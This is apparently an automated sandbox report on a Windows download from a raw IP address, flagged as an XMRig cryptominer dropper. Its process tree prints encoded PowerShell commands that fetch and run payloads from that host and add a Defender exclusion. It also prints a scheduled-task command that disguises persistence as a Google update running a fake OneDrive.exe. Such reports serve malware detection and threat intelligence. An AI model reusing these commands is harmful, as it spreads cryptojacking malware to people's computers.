Resubmissions

05-01-2023 23:51

230105-3wbz8adf75 10

05-01-2023 23:48

230105-3tlrmshc4z 8

Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    05-01-2023 23:51

General

  • Target

    http://62.204.41.194/file.exe

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.194/go.png

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://62.204.41.194/F1.exe

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.194/me.png

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 14 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Suspicious behavior: EnumeratesProcesses 55 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://62.204.41.194/file.exe
    1⤵
    • Modifies Internet Explorer Phishing Filter
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1388
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1388 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:2024
    • C:\Users\Admin\Downloads\file.exe
      "C:\Users\Admin\Downloads\file.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:288
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBnAG8ALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:720
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAG8AUwBsAGUAZQBwAC4AZQB4AGUAIgANAAoAJABXAGUAYgBGAGkAbABlACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2ADIALgAyADAANAAuADQAMQAuADEAOQA0AC8ARgAxAC4AZQB4AGUAIgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVwBlAGIARgBpAGwAZQAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1296
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBtAGUALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1496
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQAnAA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1828
    • C:\Users\Admin\Downloads\file.exe
      "C:\Users\Admin\Downloads\file.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1000
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBtAGUALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:852
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQAnAA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:440
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAG8AUwBsAGUAZQBwAC4AZQB4AGUAIgANAAoAJABXAGUAYgBGAGkAbABlACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2ADIALgAyADAANAAuADQAMQAuADEAOQA0AC8ARgAxAC4AZQB4AGUAIgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVwBlAGIARgBpAGwAZQAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
        3⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1908
        • C:\Users\Admin\AppData\Roaming\NoSleep.exe
          "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2448
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2472
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe\""
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2664
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe\""
                7⤵
                • Creates scheduled task(s)
                PID:2696
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2752
              • C:\Windows\system32\schtasks.exe
                schtasks /run /tn "GoogleUpdateTaskMachineQC"
                7⤵
                  PID:2788
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBnAG8ALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1612
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      1⤵
        PID:1620
      • C:\Windows\system32\taskeng.exe
        taskeng.exe {24B25B76-E59B-4BB3-809F-88D1AF5C5FA4} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]
        1⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2804
        • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
          C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2840
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2860
            • C:\Windows\System32\conhost.exe
              C:\Windows\System32\conhost.exe "cvxjxkjice"
              4⤵
                PID:2924
              • C:\Windows\System32\conhost.exe
                C:\Windows\System32\conhost.exe pjsnsurpv0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZebSGUfj6Vuv+kPoPZ9FoidkTm/7TRz3Cxu5/LqhuwWCS2hvmHfyPTAWIo4zY5OcwjP+79VuJh5O5c9vMH8WB3WKocLPQQ3D/631f214VrDNh9z0jOLbJJ9YXALTSKeo3z0yqpo23wDcDd1T/hDfuDceoldVJQGMTDTCXN0Q0os5qQZpM/bbi7sbKmKkdCHj6mFIu02fq5LlHaQLCNyvHRzVgK320/ko7oR3JyhnmBQHtbZUpiFNPFJEf7lTC77qWxEJ3h4yjiCPgrTI6MoBbSgjAmpPlQgNd71RJ7lG0ikmSTeoT3CddgZH5TjpSuHbPN3ha82GVaI5+j+dJzAfNAaJfxYNDrhTxng1MpRAutdkSftro/iAbX8hcx7q/b7Qg7J3CyclBC4/Mwe/Jeo6Q9AKf6F7/3Yi99ifKM20LuEsFK/pU/n4DnNACnryf3RdME
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3008

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Execution

        Scheduled Task

        1
        T1053

        Persistence

        Scheduled Task

        1
        T1053

        Privilege Escalation

        Scheduled Task

        1
        T1053

        Defense Evasion

        Modify Registry

        2
        T1112

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\86X4450S.txt
          Filesize

          603B

          MD5

          05eee3fd386064332c31b76bec5b94b9

          SHA1

          1ecceb5a32366fa00a3f3d2971878d739f7bb9a8

          SHA256

          b61cf102793be833db74ef629edf0bd5f162370ad58dd2635d76383f63af2204

          SHA512

          eba8d17ff41036b7a9f9a3a02eb7ceb31b233ffe0b5eeaaf14824c53fe4474983843f5ae3b027a75097832c3633c942150db4b5c9eff4bb1decf311574905a45

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          8c05788ad61752f961edf452a94e5730

          SHA1

          a686aff39e9b1f1525e3b6aab769a37f0e9bc782

          SHA256

          b6c9375f1b2c85857aac4235a90d7ae52919ad3bc36a976224f31bed5c04a28a

          SHA512

          5246949b16055a12ff056793caf8eae82388421d0e04b1a6110c4f341ca933f49c26a1353a6d63e16de94254fc9366d1c8b0b7062081e073e22b94e12ab2af5f

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          8c05788ad61752f961edf452a94e5730

          SHA1

          a686aff39e9b1f1525e3b6aab769a37f0e9bc782

          SHA256

          b6c9375f1b2c85857aac4235a90d7ae52919ad3bc36a976224f31bed5c04a28a

          SHA512

          5246949b16055a12ff056793caf8eae82388421d0e04b1a6110c4f341ca933f49c26a1353a6d63e16de94254fc9366d1c8b0b7062081e073e22b94e12ab2af5f

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          8c05788ad61752f961edf452a94e5730

          SHA1

          a686aff39e9b1f1525e3b6aab769a37f0e9bc782

          SHA256

          b6c9375f1b2c85857aac4235a90d7ae52919ad3bc36a976224f31bed5c04a28a

          SHA512

          5246949b16055a12ff056793caf8eae82388421d0e04b1a6110c4f341ca933f49c26a1353a6d63e16de94254fc9366d1c8b0b7062081e073e22b94e12ab2af5f

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          8c05788ad61752f961edf452a94e5730

          SHA1

          a686aff39e9b1f1525e3b6aab769a37f0e9bc782

          SHA256

          b6c9375f1b2c85857aac4235a90d7ae52919ad3bc36a976224f31bed5c04a28a

          SHA512

          5246949b16055a12ff056793caf8eae82388421d0e04b1a6110c4f341ca933f49c26a1353a6d63e16de94254fc9366d1c8b0b7062081e073e22b94e12ab2af5f

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          8c05788ad61752f961edf452a94e5730

          SHA1

          a686aff39e9b1f1525e3b6aab769a37f0e9bc782

          SHA256

          b6c9375f1b2c85857aac4235a90d7ae52919ad3bc36a976224f31bed5c04a28a

          SHA512

          5246949b16055a12ff056793caf8eae82388421d0e04b1a6110c4f341ca933f49c26a1353a6d63e16de94254fc9366d1c8b0b7062081e073e22b94e12ab2af5f

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          8c05788ad61752f961edf452a94e5730

          SHA1

          a686aff39e9b1f1525e3b6aab769a37f0e9bc782

          SHA256

          b6c9375f1b2c85857aac4235a90d7ae52919ad3bc36a976224f31bed5c04a28a

          SHA512

          5246949b16055a12ff056793caf8eae82388421d0e04b1a6110c4f341ca933f49c26a1353a6d63e16de94254fc9366d1c8b0b7062081e073e22b94e12ab2af5f

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          8c05788ad61752f961edf452a94e5730

          SHA1

          a686aff39e9b1f1525e3b6aab769a37f0e9bc782

          SHA256

          b6c9375f1b2c85857aac4235a90d7ae52919ad3bc36a976224f31bed5c04a28a

          SHA512

          5246949b16055a12ff056793caf8eae82388421d0e04b1a6110c4f341ca933f49c26a1353a6d63e16de94254fc9366d1c8b0b7062081e073e22b94e12ab2af5f

        • C:\Users\Admin\AppData\Roaming\NoSleep.exe
          Filesize

          1.3MB

          MD5

          c6783f79e545584d0e6f2bc0029db114

          SHA1

          7c99c0456b1845b2131869ff70ad7187c3241d8b

          SHA256

          f37ec25162ad07f8ee09e9a661c60e6987a5cce5fc3cb70c93b1a30c3c9cf9f3

          SHA512

          63ff48dfcc815e11661166409ad20134484de2f90ec9bf790bfb096dacc31f9c937cd0d08171671e4a69462cef31681bee00bcbb1381b28e25671345cadaff0d

        • C:\Users\Admin\AppData\Roaming\NoSleep.exe
          Filesize

          4.4MB

          MD5

          da256d1a520061b14d1cd013d99e84ff

          SHA1

          1aad91448144852bd1bf83dcb85bd14c6db160da

          SHA256

          feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

          SHA512

          8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

        • C:\Users\Admin\AppData\Roaming\NoSleep.exe
          Filesize

          4.4MB

          MD5

          da256d1a520061b14d1cd013d99e84ff

          SHA1

          1aad91448144852bd1bf83dcb85bd14c6db160da

          SHA256

          feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

          SHA512

          8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

        • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
          Filesize

          4.4MB

          MD5

          da256d1a520061b14d1cd013d99e84ff

          SHA1

          1aad91448144852bd1bf83dcb85bd14c6db160da

          SHA256

          feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

          SHA512

          8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

        • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
          Filesize

          4.4MB

          MD5

          da256d1a520061b14d1cd013d99e84ff

          SHA1

          1aad91448144852bd1bf83dcb85bd14c6db160da

          SHA256

          feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

          SHA512

          8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

        • C:\Users\Admin\Downloads\file.exe
          Filesize

          35KB

          MD5

          90481d2c6fbbe8d4ae6108d756a48d9d

          SHA1

          b08f7eafa5b562a09792bc2d4b11837eb82496bc

          SHA256

          aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8

          SHA512

          884fc809ed957b71467ca7b767a75685223ef6f518d9feba13037a79ec1bd5ee5de97a54afdc77f9c75ec7ecf8669629630d0a1f153805a28dd0c180e92c004f

        • C:\Users\Admin\Downloads\file.exe
          Filesize

          35KB

          MD5

          90481d2c6fbbe8d4ae6108d756a48d9d

          SHA1

          b08f7eafa5b562a09792bc2d4b11837eb82496bc

          SHA256

          aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8

          SHA512

          884fc809ed957b71467ca7b767a75685223ef6f518d9feba13037a79ec1bd5ee5de97a54afdc77f9c75ec7ecf8669629630d0a1f153805a28dd0c180e92c004f

        • C:\Users\Admin\Downloads\file.exe.invysg4.partial
          Filesize

          35KB

          MD5

          90481d2c6fbbe8d4ae6108d756a48d9d

          SHA1

          b08f7eafa5b562a09792bc2d4b11837eb82496bc

          SHA256

          aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8

          SHA512

          884fc809ed957b71467ca7b767a75685223ef6f518d9feba13037a79ec1bd5ee5de97a54afdc77f9c75ec7ecf8669629630d0a1f153805a28dd0c180e92c004f

        • \Users\Admin\AppData\Roaming\NoSleep.exe
          Filesize

          4.4MB

          MD5

          da256d1a520061b14d1cd013d99e84ff

          SHA1

          1aad91448144852bd1bf83dcb85bd14c6db160da

          SHA256

          feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

          SHA512

          8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

        • \Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
          Filesize

          4.4MB

          MD5

          da256d1a520061b14d1cd013d99e84ff

          SHA1

          1aad91448144852bd1bf83dcb85bd14c6db160da

          SHA256

          feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

          SHA512

          8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

        • memory/288-55-0x0000000000000000-mapping.dmp
        • memory/288-57-0x0000000000F00000-0x0000000000F10000-memory.dmp
          Filesize

          64KB

        • memory/440-77-0x0000000000000000-mapping.dmp
        • memory/440-117-0x000000000224B000-0x000000000226A000-memory.dmp
          Filesize

          124KB

        • memory/440-102-0x0000000002244000-0x0000000002247000-memory.dmp
          Filesize

          12KB

        • memory/440-116-0x0000000002244000-0x0000000002247000-memory.dmp
          Filesize

          12KB

        • memory/440-106-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp
          Filesize

          11.4MB

        • memory/440-93-0x000007FEF3FB0000-0x000007FEF49D3000-memory.dmp
          Filesize

          10.1MB

        • memory/720-138-0x00000000022CB000-0x00000000022EA000-memory.dmp
          Filesize

          124KB

        • memory/720-62-0x000007FEFBA01000-0x000007FEFBA03000-memory.dmp
          Filesize

          8KB

        • memory/720-127-0x00000000022C4000-0x00000000022C7000-memory.dmp
          Filesize

          12KB

        • memory/720-137-0x00000000022C4000-0x00000000022C7000-memory.dmp
          Filesize

          12KB

        • memory/720-66-0x000007FEF3FB0000-0x000007FEF49D3000-memory.dmp
          Filesize

          10.1MB

        • memory/720-89-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp
          Filesize

          11.4MB

        • memory/720-97-0x00000000022C4000-0x00000000022C7000-memory.dmp
          Filesize

          12KB

        • memory/720-122-0x00000000022CB000-0x00000000022EA000-memory.dmp
          Filesize

          124KB

        • memory/720-58-0x0000000000000000-mapping.dmp
        • memory/852-112-0x000000000249B000-0x00000000024BA000-memory.dmp
          Filesize

          124KB

        • memory/852-100-0x0000000002494000-0x0000000002497000-memory.dmp
          Filesize

          12KB

        • memory/852-156-0x000000000249B000-0x00000000024BA000-memory.dmp
          Filesize

          124KB

        • memory/852-109-0x000000001B810000-0x000000001BB0F000-memory.dmp
          Filesize

          3.0MB

        • memory/852-130-0x0000000002494000-0x0000000002497000-memory.dmp
          Filesize

          12KB

        • memory/852-151-0x000000000249B000-0x00000000024BA000-memory.dmp
          Filesize

          124KB

        • memory/852-108-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp
          Filesize

          11.4MB

        • memory/852-76-0x0000000000000000-mapping.dmp
        • memory/852-91-0x000007FEF3FB0000-0x000007FEF49D3000-memory.dmp
          Filesize

          10.1MB

        • memory/1000-73-0x0000000000080000-0x0000000000090000-memory.dmp
          Filesize

          64KB

        • memory/1000-71-0x0000000000000000-mapping.dmp
        • memory/1296-88-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp
          Filesize

          11.4MB

        • memory/1296-123-0x00000000027DB000-0x00000000027FA000-memory.dmp
          Filesize

          124KB

        • memory/1296-96-0x00000000027D4000-0x00000000027D7000-memory.dmp
          Filesize

          12KB

        • memory/1296-111-0x000000001B700000-0x000000001B9FF000-memory.dmp
          Filesize

          3.0MB

        • memory/1296-78-0x000007FEF3FB0000-0x000007FEF49D3000-memory.dmp
          Filesize

          10.1MB

        • memory/1296-121-0x00000000027D4000-0x00000000027D7000-memory.dmp
          Filesize

          12KB

        • memory/1296-128-0x00000000027DB000-0x00000000027FA000-memory.dmp
          Filesize

          124KB

        • memory/1296-59-0x0000000000000000-mapping.dmp
        • memory/1296-126-0x00000000027D4000-0x00000000027D7000-memory.dmp
          Filesize

          12KB

        • memory/1496-60-0x0000000000000000-mapping.dmp
        • memory/1496-98-0x0000000002414000-0x0000000002417000-memory.dmp
          Filesize

          12KB

        • memory/1496-145-0x000000000241B000-0x000000000243A000-memory.dmp
          Filesize

          124KB

        • memory/1496-90-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp
          Filesize

          11.4MB

        • memory/1496-129-0x0000000002414000-0x0000000002417000-memory.dmp
          Filesize

          12KB

        • memory/1496-144-0x0000000002414000-0x0000000002417000-memory.dmp
          Filesize

          12KB

        • memory/1496-124-0x000000000241B000-0x000000000243A000-memory.dmp
          Filesize

          124KB

        • memory/1496-68-0x000007FEF3FB0000-0x000007FEF49D3000-memory.dmp
          Filesize

          10.1MB

        • memory/1612-92-0x000007FEF3FB0000-0x000007FEF49D3000-memory.dmp
          Filesize

          10.1MB

        • memory/1612-74-0x0000000000000000-mapping.dmp
        • memory/1612-131-0x0000000002714000-0x0000000002717000-memory.dmp
          Filesize

          12KB

        • memory/1612-140-0x000000000271B000-0x000000000273A000-memory.dmp
          Filesize

          124KB

        • memory/1612-125-0x000000000271B000-0x000000000273A000-memory.dmp
          Filesize

          124KB

        • memory/1612-105-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp
          Filesize

          11.4MB

        • memory/1612-101-0x0000000002714000-0x0000000002717000-memory.dmp
          Filesize

          12KB

        • memory/1612-139-0x0000000002714000-0x0000000002717000-memory.dmp
          Filesize

          12KB

        • memory/1828-118-0x0000000002854000-0x0000000002857000-memory.dmp
          Filesize

          12KB

        • memory/1828-104-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp
          Filesize

          11.4MB

        • memory/1828-82-0x000007FEF3FB0000-0x000007FEF49D3000-memory.dmp
          Filesize

          10.1MB

        • memory/1828-99-0x0000000002854000-0x0000000002857000-memory.dmp
          Filesize

          12KB

        • memory/1828-119-0x000000000285B000-0x000000000287A000-memory.dmp
          Filesize

          124KB

        • memory/1828-61-0x0000000000000000-mapping.dmp
        • memory/1908-75-0x0000000000000000-mapping.dmp
        • memory/1908-107-0x000007FEF3450000-0x000007FEF3FAD000-memory.dmp
          Filesize

          11.4MB

        • memory/1908-94-0x000007FEF3FB0000-0x000007FEF49D3000-memory.dmp
          Filesize

          10.1MB

        • memory/1908-136-0x000000000236B000-0x000000000238A000-memory.dmp
          Filesize

          124KB

        • memory/1908-103-0x0000000002364000-0x0000000002367000-memory.dmp
          Filesize

          12KB

        • memory/1908-135-0x0000000002364000-0x0000000002367000-memory.dmp
          Filesize

          12KB

        • memory/1908-110-0x000000001B7E0000-0x000000001BADF000-memory.dmp
          Filesize

          3.0MB

        • memory/1908-113-0x000000000236B000-0x000000000238A000-memory.dmp
          Filesize

          124KB

        • memory/2448-133-0x0000000000000000-mapping.dmp
        • memory/2472-141-0x00000000001B0000-0x000000000060B000-memory.dmp
          Filesize

          4.4MB

        • memory/2472-142-0x000000001B9A0000-0x000000001BDFC000-memory.dmp
          Filesize

          4.4MB

        • memory/2472-143-0x000000001B540000-0x000000001B974000-memory.dmp
          Filesize

          4.2MB

        • memory/2664-146-0x0000000000000000-mapping.dmp
        • memory/2696-147-0x0000000000000000-mapping.dmp
        • memory/2752-150-0x0000000000000000-mapping.dmp
        • memory/2788-152-0x0000000000000000-mapping.dmp
        • memory/2840-154-0x0000000000000000-mapping.dmp
        • memory/2860-157-0x00000000001F0000-0x00000000001F6000-memory.dmp
          Filesize

          24KB

        • memory/2924-160-0x0000000000000000-mapping.dmp
        • memory/2924-161-0x00000000000A0000-0x00000000000B9000-memory.dmp
          Filesize

          100KB

        • memory/2924-162-0x0000000000340000-0x000000000035A000-memory.dmp
          Filesize

          104KB

        • memory/2924-163-0x0000000000360000-0x000000000036E000-memory.dmp
          Filesize

          56KB

        • memory/2924-158-0x00000000000A0000-0x00000000000B9000-memory.dmp
